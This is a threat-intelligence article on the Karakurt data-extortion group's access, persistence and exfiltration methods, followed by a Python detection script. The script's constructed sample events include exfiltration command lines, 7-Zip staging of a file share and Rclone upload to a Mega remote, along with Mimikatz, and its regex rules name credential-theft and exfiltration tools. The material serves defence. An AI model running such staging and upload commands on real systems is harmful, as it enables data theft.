Under the self-proclaimed name Karakurt, a new financially motivated threat group has been discovered. In the third quarter, the gang began to ramp up its attacks, which continued until the fourth quarter.
Accenture researchers discovered Karakurt’s attacks after several sightings in a short period of time. Data exfiltration is the group’s primary aim, followed by extortion.
Karakurt made its initial appearance in June, when it registered its dump-site domains (karakurt[.]group and karakurt[.]tech), and it followed up in August with its Twitter handle (karakurtlair).
Between September and November, the threat group had already targeted over 40 victims across various industries.
The group’s tactics differ depending on the victim’s environment. It frequently chooses a living-off-the-land approach and avoids the use of common post-exploitation tools like Cobalt Strike.
The threat group has already been linked to other cybercriminals’ attack infrastructure. However, the nature of its operations (for example, affiliate-based model or RaaS) is unknown.
The majority of the group’s victims, 95 percent, were discovered in North America, while the rest were found in Europe. The group does not target a specific industry and instead selects victims at random.
For obtaining initial access, the Karakurt group primarily uses VPN credentials obtained from sellers or phishing.
For persistence, the group employs Cobalt Strike, which has been replaced by AnyDesk in recent attacks. They also use Mimikatz to steal administrators’ credentials for privilege escalation.
To steal data, the group compresses files using genuine data compression tools such as 7zip and WinZip and then sends all data to Mega[.]io using Rclone/FileZilla.
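The tool chain described above (Mimikatz for credentials, 7zip/WinZip for staging, Rclone/FileZilla to Mega for transfer, AnyDesk for remote access) lends itself to host-level correlation: none of the tools is malicious on its own, but several of them appearing on the same host in sequence is a strong signal. The following is an added detection example, not code from the article or from Accenture. It runs over constructed Sysmon-style process-creation and DNS records; the event layout, the `mega:` Rclone remote name and the Mega domain list are assumptions made for the example.

```python
"""Correlate process and DNS telemetry against the Karakurt-style exfiltration chain.

Added example: the event records below are constructed for illustration and are
not from the article or from any real intrusion; only the tool names come from it.
"""
import re
from collections import defaultdict

# Each record mimics a Sysmon-like event: host, image path, command line, DNS query (assumed shape).
SAMPLE_EVENTS = [
    # WS01: credential theft, local compression, then Rclone to a Mega remote (constructed)
    {"host": "WS01", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami", "dns": None},
    {"host": "WS01", "image": r"C:\Users\admin1\AppData\Local\Temp\mimikatz.exe", "cmdline": "mimikatz.exe", "dns": None},
    {"host": "WS01", "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r'7z.exe a -r C:\Temp\stage.7z "\\fileserver\finance"', "dns": None},
    {"host": "WS01", "image": r"C:\Users\admin1\AppData\Local\Temp\rclone.exe",
     "cmdline": r"rclone.exe copy C:\Temp\stage.7z mega:backup", "dns": None},
    # FS02: a remote-access tool alone, which may well be legitimate IT activity (constructed)
    {"host": "FS02", "image": r"C:\ProgramData\AnyDesk\AnyDesk.exe", "cmdline": "AnyDesk.exe", "dns": None},
    # WS03: WinZip staging followed by a DNS lookup of the storage provider (constructed)
    {"host": "WS03", "image": r"C:\Program Files\WinZip\WINZIP64.EXE",
     "cmdline": r"WINZIP64.EXE -a C:\Temp\hr.zip C:\HR", "dns": None},
    {"host": "WS03", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k NetworkService", "dns": "g.api.mega.co.nz"},
    # WS09: benign activity only (constructed)
    {"host": "WS09", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt", "dns": None},
]

# Stage label, pattern, and which field(s) the pattern is applied to.
# Name matching is deliberately simple: a renamed binary evades it, so pair this with
# behavioural telemetry (e.g. LSASS access events) in a real deployment.
STAGE_RULES = [
    ("credential_access", re.compile(r"mimikatz", re.I), "image+cmdline"),
    ("staging", re.compile(r"(?:^|\\)(?:7z|7za|7zg|winzip\d*|wzzip)\.exe$", re.I), "image"),
    ("exfil_tool", re.compile(r"(?:^|\\)(?:rclone|filezilla)\.exe$", re.I), "image"),
    ("remote_access", re.compile(r"(?:^|\\)anydesk\.exe$", re.I), "image"),
]
# Assumed set of Mega domains; extend from your own DNS baseline.
EXFIL_DOMAINS = re.compile(r"(?:^|\.)mega\.(?:io|nz|co\.nz)$", re.I)
# Rclone addresses remotes as "<remote>:<path>"; a remote literally named "mega" is assumed here.
RCLONE_MEGA_REMOTE = re.compile(r"\bmega:", re.I)


def classify_event(ev):
    """Return the set of chain stages a single event matches."""
    stages = set()
    image = ev.get("image") or ""
    cmd = ev.get("cmdline") or ""
    for stage, pattern, field in STAGE_RULES:
        haystack = image + " " + cmd if field == "image+cmdline" else image
        if pattern.search(haystack):
            stages.add(stage)
    dns = ev.get("dns") or ""
    if RCLONE_MEGA_REMOTE.search(cmd) or (dns and EXFIL_DOMAINS.search(dns)):
        stages.add("exfil_destination")
    return stages


def severity(stages):
    """Rate a host: staged data plus a transfer tool or destination is the exfil chain itself."""
    if "staging" in stages and ("exfil_tool" in stages or "exfil_destination" in stages):
        return "high"
    if len(stages) >= 2:
        return "medium"
    return "low"


def correlate(events):
    """Aggregate stage hits per host and return {host: {"stages": [...], "severity": ...}}."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(classify_event(ev))
    return {
        host: {"stages": sorted(stages), "severity": severity(stages)}
        for host, stages in per_host.items()
        if stages
    }


if __name__ == "__main__":
    for host, finding in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {finding['severity']:6} {', '.join(finding['stages'])}")
```

The scoring is intentionally conservative about AnyDesk: a remote-access tool on its own is rated low, because it is common in legitimate administration, while a compression tool followed by Rclone or a lookup of the storage provider on the same host is rated high regardless of whether the credential-theft stage was observed. In practice the window over which events are grouped per host (hours, not the whole dataset) and the baseline of approved backup tooling are what keep the false-positive rate down.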
The Karakurt hacking group focuses on encryption-less attacks that appear to be less harmful than ransomware. Threatening to release victims’ sensitive data, on the other hand, is equally dangerous. Hence, businesses should concentrate on defense, prevention, and detection of such threats.